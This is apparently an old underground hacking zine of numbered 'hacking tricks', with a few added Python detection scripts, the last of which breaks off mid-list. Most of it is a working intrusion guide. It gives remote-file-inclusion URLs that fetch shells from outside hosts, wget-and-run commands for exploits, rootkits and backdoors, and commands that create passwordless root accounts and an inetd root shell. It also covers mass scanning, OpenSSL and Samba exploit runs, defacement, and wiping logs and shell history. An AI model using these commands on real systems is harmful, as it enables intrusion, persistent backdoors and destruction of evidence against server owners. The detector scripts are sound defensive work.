http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html

That's all, my friends. Just try it !!!
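Every URL in this tutorial has the same shape: an include parameter (filename, content, page, link, file, and basepath in the My_eGallery trick further down) whose value is a remote http:// URL, usually followed by a cmd parameter. The script below is an added example, not part of the original tutorial; it scans web-server access-log lines for exactly that shape. The combined-log format, the sample lines and the attacker.example hostname are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Query parameters that the page's examples abuse for remote file inclusion.
INCLUSION_PARAMS = {"filename", "content", "page", "link", "file", "basepath"}
REMOTE_SCHEME_RE = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)

# Assumed combined-log style line (constructed for this example, not from the page):
#   <client> - - [<time>] "<method> <target> HTTP/1.x" <status> <bytes>
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_query(query):
    """Split a raw query string into {name: [values]}. Done by hand so that ';'
    stays inside a value (it is part of the injected command, not a separator)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def analyse_target(target):
    """Return a list of findings for one request target (path plus query)."""
    findings = []
    _, _, query = target.partition("?")
    params = parse_query(query)
    for name, values in params.items():
        if name in INCLUSION_PARAMS:
            for value in values:
                if REMOTE_SCHEME_RE.match(value):
                    findings.append(f"remote URL in include parameter '{name}'")
    if "cmd" in params:
        findings.append("shell command parameter 'cmd' present")
    return findings


def scan_access_log(lines):
    """Return [(client, target, findings)] for every suspicious request."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m is None:
            continue
        findings = analyse_target(m["target"])
        if findings:
            hits.append((m["client"], m["target"], findings))
    return hits


# Constructed sample lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Feb/2005:10:00:00 +0700] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Feb/2005:10:00:05 +0700] "GET /target/index.php?filename=http://attacker.example/injex.txt?&cmd=ls%20-al;uname%20-ar;id HTTP/1.1" 200 2048',
    '203.0.113.7 - - [25/Feb/2005:10:00:09 +0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=HTTP://attacker.example/suntik.txt? HTTP/1.1" 200 1337',
    '198.51.100.2 - - [25/Feb/2005:10:01:00 +0700] "GET /index.php?file=news.php HTTP/1.1" 200 700',
    "not a log line",
]

if __name__ == "__main__":
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(client, target, "->", "; ".join(findings))
```

On the application side the fix is to never hand request data to include(), or to map the parameter onto an allowlist of local files; disabling allow_url_include in php.ini removes the remote part of this attack regardless of the application code.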

HACKING TRICK 8

=======
VHOST

= edit it in httpd.conf
= then just add it
= in named.conf too
= 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz
= 2. tar zxvf apache_1.3.27.tar.gz
= 3. cd apache_1.3.27
= 4. ./configure
= 5. make
= 6. make install
= 7. /usr/local/apache/bin/apachectl start
= cd /usr/local/apache/conf
= example
= echo "" > httpd.conf
= echo "ServerName www.Cmaster4.net" >> httpd.conf
= echo "DocumentRoot /home/iptek/public_html" >> httpd.conf
= echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" >> httpd.conf
= echo "
" >> httpd.conf
= ------------------------------
= ------------------------------
= ------------------------------
= find |grep named.conf
= echo 'zone "i-am.Cmaster4.net" IN {' >> named.conf
= echo 'type master;' >> named.conf
= echo 'file "/var/named/named.local";' >> named.conf
= echo 'allow-update { none; };' >> named.conf
= echo '};' >> named.conf
= then after that restart named and httpd
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= or
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= or, if they are not under /etc/init.d/, try typing find |grep named and then find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1. install bindtty
2. if bindtty does not run, install shell.php
3. if that does not run either, try cgi-telnet
for example
http://livron.port5.com/mail.php <--------- this is the shell source
e.g.:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php
if that does not work, look for a folder the wwrun id can wget into
if it works... open:
http://www.target.org/modules/My_eGallery/public/mail.php
========
install bindtty
wget www.geocities.com/lifron/bindtty -O /tmp/httpd   <-- so the wget result is put in the /tmp folder under the file name httpd
then make the file executable
chmod 755 /tmp/httpd
============
cgi-telnet
find the cgi-bin folder >> that is where we put cgi-telnet
usually the cgi-bin folder is under .../www
but on most web servers
each user is given their own cgi-bin folder
example:
/home/users/russisk/html/modules/My_eGallery/public <------ earlier we were in this folder
http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk
the cgi-bin is visible
cd to the cgi-bin folder, then wget into it
Example:
wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl
if that works, continue with
chmod 755 /home/users/russisk/cgi-bin/cgi.pl <------- so that cgi.pl becomes an executable file
if that works, just open:
www.target.org/cgi-bin/cgi.pl port 7788
============ end
wget www.geocities.com/lifron/psy.tar.gz;
tar -zvxf psy.tar.gz
cd .psy
./config KuNTuA 6669
./fuck
./run
===========

HACKING TRICK 7

Usage: ./sambal [-bBcCdfprsStv] [host]

-b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (default = 300)
-c connectback ip address
-C max childs for scan/bruteforce mode (default = 40)
-d bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
EXAMPLE:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba

./sambal -b 0 -v

===========
Usage: ./mayday-linux -t [-pa]
-t target The host to attack.
-a password Default password is "changeme".
-p port Default port is 8001.
================
/usr/sbin/adduser httpd
passwd httpd

============
PATCH SAMBA
= [root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======

HACKING TRICK 6

-----------------
Patch Your Root
-----------------
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy

CLEAN TRACKS: manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT
http://www.geocities.com/lifron/local.tar.gz

2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661

-------------------
Add user as root:
-------------------
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua

/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes

/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes

2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks

/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus

/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
----------------------------
**add user with root access
----------------------------
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano

/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik

/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
-----------
Delete User
-----------
/usr/sbin/userdel -r [username]
IMPORTANT
once you get ROOT
type id
uname -a
after that
type cd /tmp
-----------------
--------------------------------------------
Rooting Linux ssh on port 22:

wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz
cd grabbb
gcc -o grabbb grabbb.c
./grabbb -a IP -b IP port   e.g.: ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210

--------------------------------------------
wget www.suckmyass.org/ssh-scan8.tar.gz
tar -zxvf ssh-scan8.tar.gz
cd ssh-scan8
./r00t 203.20 -d 4 <--- mass SSH scan
./r00t 203.20 -d 2 <--- mass FTP scan
./r00t 203.20 -d 3 <--- mass FTP scan


./r00t 134.7. -d 4
--------------------------------------------
Rooting SCO OS:
wget www.renjana.com/sco
./sco IP

--------------------------------------------

install a backdoor:
1.

id
uname -a
cd /tmp
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
ls -al
tar -zxvf tk.tgz
cd tk
./t0rn kuntua 7000

--------------------------------------------

HACKING TRICK 5

=================================================================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
tar -zxvf ftp.tgz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
port scan with pscan.c ==> www.packetstormsecurity.nl
if port 23 is vulnerable, the exploit can be run
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================

=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Then connect to the shell as a normal user, cd /tmp and
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Up to here we are done playing on the target server as root
Now we go back to the user and type:
./sh
so, what happens after we run the ./sh command...?
what happens is that our uid and gid are 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
+Command Mapache2x
- ./mapache RangeIP (e.g.: ./mapache 200 443 10 10) << Scan
- ./apache IPTarget (e.g.: ./apache 202.11159.67.176)
==================================
+Command MassApache
- ./massossl RangeIP (e.g.: ./massossl 22200 443 10 10) << Scan
- ./osslx -a 0x0b -v IPTarget (e.g.: ./osslx -a 0x0b -v 202.159.67.176)
================================================
+FTP Command 4 RooT

- ./scan <leading octet of target IP> (e.g.: ./scan 210 21 10)

=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow

adduser? type /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua then enter,
to set a password type passwd kuntua then enter,
after that type tondano and press enter, then type tondano again, note: typing tondano twice is what sets our password

Changing password for user ganjen
passwd: all authentication tokens updated successfully

that means we already have a user on that shell, so just log in, don't forget to note down the ip..

to get root access type:

/usr/sbin/useradd bash -u 0 -d /

after that type again

passwd -d bash

erase tracks
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

typed it all? done... press ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000

***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon

HACKING TRICK 4

=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse

: Opening 30 connections
Establishing SSL connections

-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638

: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: NOW LET'S PLAY WITH ROOT :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir .... ; cd ....
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1

GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell

*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1

Good Luck d0inks!

mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
log in to the shell
last | grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== delete all tools
test shell with port 7788 and password 35b4tud1n91n
=================================================================================================
[Log Deletion Step I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Log Deletion Step II]
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================

HACKING TRICK 3

=================================================================================================
1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================================================================
1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0x15 -v 212.70.224.129
=================================================================================================
1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
=================================================================================================
1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
=================================================================================================
1. wget www.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 -v IP <=== attack
=================================================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================
DEFACE
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA Was Here" > mnc.html
to test it:
http://IP-you-hacked/~apache
=================================================================================================
Install WGET
=================================================================================================
1. try typing: cat /etc/issue, to see the operating system
2. type: ftp ftp.rpmfind.net
3. login: anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit ftp
8. Installation process
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: COMMAND ADDUSER :
=================================================================================================
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua
/usr/sbin/useradd tondano -u 0 -d /
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
passwd -d tondano
Changing password for user tondano
Removing password for user tondano
passwd: Success
=================================================================================================
passwd kuntua
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user kuntua
passwd: all authentication tokens updated successfully
passwd tondano
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user tondano
passwd: all authentication tokens updated successfully
=================================================================================================

HACKING TRICK 2

=================================================================================================
CREATE BACKDOOR
=================================================================================================
echo "kuntua 1979/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135
telnet to port "1979"
=================================================================================================
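The inetd entry above binds an interactive root shell (sh -i) to a freshly added service port. A quick way to spot that on a host is to parse inetd.conf together with /etc/services; the following Python check is an added defender-side example, not part of the original zine, run on constructed sample lines that include the entry from this section.

```python
"""Flag inetd.conf services that hand out a root shell, as in the trick above.

Added example, not from the original zine. The two sample files below are
constructed; the "kuntua" service mirrors the echo lines on this page.
"""
import shlex
from typing import Dict, List, Optional, Tuple

SAMPLE_SERVICES = """\
ftp             21/tcp
telnet          23/tcp
kuntua          1979/tcp
"""

SAMPLE_INETD = """\
#<service> <socket> <proto> <flags> <user> <server> <args>
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
kuntua  stream  tcp  nowait  root  /bin/sh  sh -i
"""

# Programs that should never be the server field of an inetd entry.
SHELL_NAMES = {"sh", "bash", "ksh", "csh", "zsh", "dash"}

Finding = Tuple[str, Optional[int], str]  # (service, port, reason)


def parse_services(text: str) -> Dict[str, int]:
    """Map service name -> port for tcp entries in /etc/services format."""
    ports: Dict[str, int] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop trailing comments
        parts = line.split()
        if len(parts) < 2 or "/" not in parts[1]:
            continue
        port_str, proto = parts[1].split("/", 1)
        if proto == "tcp" and port_str.isdigit():
            ports[parts[0]] = int(port_str)
    return ports


def is_shell(program: str) -> bool:
    """True for /bin/sh, bash, ./sh and so on (basename match)."""
    return program.rsplit("/", 1)[-1] in SHELL_NAMES


def suspicious_inetd_entries(inetd_text: str, services_text: str) -> List[Finding]:
    """Return entries whose server program is a shell, noting -i and root."""
    ports = parse_services(services_text)
    findings: List[Finding] = []
    for line in inetd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = shlex.split(line)
        if len(fields) < 6:
            continue                      # not a complete inetd entry
        service, _socket, _proto, _flags, user, server = fields[:6]
        args = fields[6:]
        shell_like = is_shell(server) or (bool(args) and is_shell(args[0]))
        if not shell_like:
            continue
        reasons = ["server program is a shell"]
        if "-i" in args:
            reasons.append("interactive shell flag -i")
        if user.split(".")[0] == "root":   # user field may be user.group
            reasons.append("as root")
        findings.append((service, ports.get(service), "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for service, port, reason in suspicious_inetd_entries(SAMPLE_INETD, SAMPLE_SERVICES):
        print(f"{service} (port {port}): {reason}")
```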
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]#rpm -qa | grep samba

samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36

[root@gila /]# arp -n

Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1

[root@gila /]# nmblookup -d2 '*' # to detect NetBIOS

Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )

[root@gila /]# locate findsmb
/usr/bin/findsmb

[root@router /]# findsmb

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
-----------------------------------------
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]

[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
--------- ---- -------
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication

[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/

[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98

[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================================================================
: CLEAN LOGS :
=================================================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================

HACKING TRICK 1

author: my friends

: PSYBNC SETUP TRICK :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /var/tmp/ ; mkdir .... ; cd .... ;
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;
wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ;
mv ./psybncchk .sh ;
mv ./log/psybnc.log .mud ;
find |grep psybnc
=================================================================================================
: LOG DELETION TRICK :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
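The log-wiping recipes in this section and in the earlier "CLEAN TRACKS", "erase tracks" and "Log Deletion Step" blocks all leave the same fingerprints: a log that is 0 or 1 bytes long (rm then touch, or echo > file) and a .bash_history that is a symlink to /dev/null. The check below is an added defender-side example, not part of the original zine; build_fixture() constructs a throw-away directory tree reproducing those states so the check runs offline, and on a real host the same function would be pointed at "/".

```python
"""Spot the leftovers of the log wiping shown in the sections above.

Added example, not from the original zine. "echo >/var/log/wtmp" leaves a
one-byte file, "rm ... ; touch ..." and "cat > file" + ctrl-d leave a
zero-byte one, and "ln -s /dev/null .bash_history" leaves a symlink; all
three are easy to detect. build_fixture() constructs the sample tree.
"""
import os
import tempfile
from typing import List, Tuple

# Paths (relative to the filesystem root) that the tricks above empty or remove.
LOG_FILES = [
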